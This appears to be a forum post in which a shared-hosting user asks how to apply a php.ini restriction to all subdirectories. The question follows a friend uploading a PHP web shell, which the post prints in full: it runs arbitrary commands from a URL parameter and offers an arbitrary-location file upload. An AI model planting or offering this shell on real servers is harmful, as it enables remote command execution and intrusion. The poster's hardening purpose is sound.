A few weeks ago I opened up a hole on my shared server and my friend uploaded the following PHP script:

<?php if(isset($_REQUEST['cmd'])) {     echo '<pre>';     $cmd = ($_REQUEST['cmd']);     system($cmd);     echo '</pre>';     die; } ?>  <?php if(isset($_REQUEST['upload'])) {     echo '<form enctype='multipart/form-data' action='.config.php?send' method='POST'>         <input type='hidden' name='MAX_FILE_SIZE' value='5120000' />         Send this file: <input name='userfile' type='file' />         To here: <input type='text' name='direct' value='/home/chriskan/public_html/_phx2600/wp-content/???' />         <input type='submit' value='Send File' />     </form>'; } ?>  <?php if(isset($_REQUEST['send'])) {     $uploaddir = $_POST['direct'];     $uploadfile = $uploaddir . basename($_FILES['userfile']['name']);      if (move_uploaded_file($_FILES['userfile']['tmp_name'], $uploadfile)) {         echo 'File is valid, and was successfully uploaded.\n'; echo $uploaddir;     } else {         echo 'Upload failed';     } } ?> 

This script allows him to process commands through in-URL variables.

I have disabled system, among other functions, in the php.ini file in my public_html directory. This will prevent the script from running if it’s located within my public_html directory, but doesn’t stop it if it’s in a sub-directory of that. If I copy the php.ini file into a sub-directory it will stop it from running from that directory.

My question is, how do I enable my php.ini file to affect all directories/sub-directories of my server?